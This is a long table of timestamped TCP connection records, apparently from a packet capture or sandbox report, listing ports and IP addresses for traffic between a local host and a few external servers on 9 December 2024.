Dec 9, 2024 08:08:32.691418886 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.696011066 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.696022987 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.696063995 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.696078062 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.700735092 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.700891972 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.799304962 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.799436092 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.799496889 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.801285982 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.801404953 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.801454067 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.805383921 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.805509090 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.805557013 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.806113958 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:32.806166887 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:32.806199074 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:32.806240082 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:32.809434891 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.809540033 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.809590101 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.813371897 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.813483953 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.813533068 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.817255974 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.817363024 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.817406893 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.821014881 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.821125984 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.821177959 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.824807882 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.824932098 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.824978113 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.828299046 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.828408957 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.828457117 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.831924915 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.832036018 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.832092047 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.835525036 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.835587025 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.835647106 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.839078903 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.839198112 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.839246988 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.840425014 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:32.840544939 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:32.840604067 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:32.840750933 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:32.840768099 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:32.842658997 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.842700958 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.842732906 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.842812061 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.846191883 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.846246004 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.846285105 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.846339941 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.849878073 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.849925995 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.849976063 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.850016117 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.853337049 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.853383064 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.853451014 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.853493929 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.856883049 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.856926918 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.856987953 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.857029915 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.860451937 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.860498905 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.860528946 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.860569000 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.864018917 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.864074945 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.864080906 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.864115000 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.867604017 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.867655993 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.867708921 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.867786884 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.871190071 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.871237040 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.871268034 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.871315002 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.874804974 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.874882936 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.874928951 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.878395081 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.878541946 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.878596067 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.881933928 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.881988049 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.882122040 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.882204056 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.885693073 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.885751963 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.885780096 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.885813951 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.889059067 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.889108896 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.889187098 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.889233112 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.892601967 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.892656088 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.892682076 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.892724037 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.896174908 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.896234989 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.896262884 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.896310091 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.899734974 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.899780989 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.899840117 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.899883032 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.903328896 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.903403997 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.903476954 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.906842947 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.906924963 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.991091013 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.991164923 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.991218090 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.991255999 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.992501020 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.992548943 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.993041039 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.993169069 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.993210077 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.995903969 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.996011019 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.996062994 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.998780966 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.998831987 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.998832941 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.998867035 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.999033928 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:32.999083042 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:33.001091003 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:33.001604080 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.001677990 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.001733065 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.001777887 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.004451990 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.004508972 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.004602909 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.004673958 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.007090092 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.007153034 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.007199049 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.009694099 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.009749889 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.009783030 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.009829044 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.012320042 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.012433052 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.012478113 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.014906883 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.014960051 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.015063047 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.015106916 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.017524958 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.017568111 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.017595053 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.017647982 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.019996881 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.020083904 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.020119905 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.020158052 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.022438049 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.022449970 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.022500038 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.024940968 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.024990082 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.025022984 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.025062084 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.027261019 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.027367115 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.027407885 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.029666901 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.029706955 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.029779911 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.029819965 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.032013893 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.032062054 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.032095909 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.034404039 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.034445047 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.034449100 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.034482002 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.036766052 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.036911011 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.036952972 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.039150000 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.039278984 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.039333105 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.041492939 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.041570902 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.041605949 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.041654110 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.043971062 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.044025898 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.044029951 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.044069052 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.046199083 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.046245098 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.046302080 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.046353102 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.048563957 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.048612118 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.048671961 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.048711061 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.050918102 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.051033020 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.051074982 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.053286076 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.053343058 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.053406000 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.053515911 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.055645943 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.055694103 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.055753946 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.055795908 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.058012009 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.058063984 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.058124065 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.058171034 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.060437918 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.060456038 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.060484886 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.060501099 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.062751055 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.062834978 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.062850952 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.062886953 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.065135002 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.065185070 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.065227985 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.065270901 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.067478895 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.067598104 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.067651987 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.069842100 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.070075035 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.070116997 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.072213888 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.072318077 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.072376966 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.074562073 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.074625015 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.074656010 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.074687958 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.076930046 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.077028036 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.077069044 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.079294920 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.079333067 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.079389095 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.079427004 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.081655979 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.081743956 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.081785917 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.083995104 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.084038973 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.084099054 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.084762096 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.086368084 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.086483955 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.086529970 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.088788033 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.088886023 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.088927984 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.091128111 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.091171026 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.091187954 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.091223001 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.093549013 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.093606949 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.093651056 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.096215010 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.096256018 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.096278906 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.096317053 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.098187923 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.098299980 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.098308086 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.098339081 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.100536108 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.100589037 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.100637913 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.102936983 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.103003979 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.103070974 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.103137016 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.105281115 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.105329990 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.105392933 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.105427027 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.107712030 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.107769012 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.107793093 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.107835054 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.110011101 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.110140085 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.110171080 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.110193014 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.112447023 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.112504959 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.112694025 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.112735987 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.114810944 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.114856005 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.114928007 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.114989996 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.117100954 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.117145061 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.117188931 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.117242098 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.120296955 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:33.183640003 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.183695078 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.183757067 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.183789015 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.184499025 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.184604883 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.184647083 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.186296940 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.186342955 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.186393023 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.186469078 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.188087940 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.188179016 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.188226938 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.189917088 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.190006018 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:33.190049887 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:33.191605091 CET	80	49829	185.215.113.16	192.168.2.4
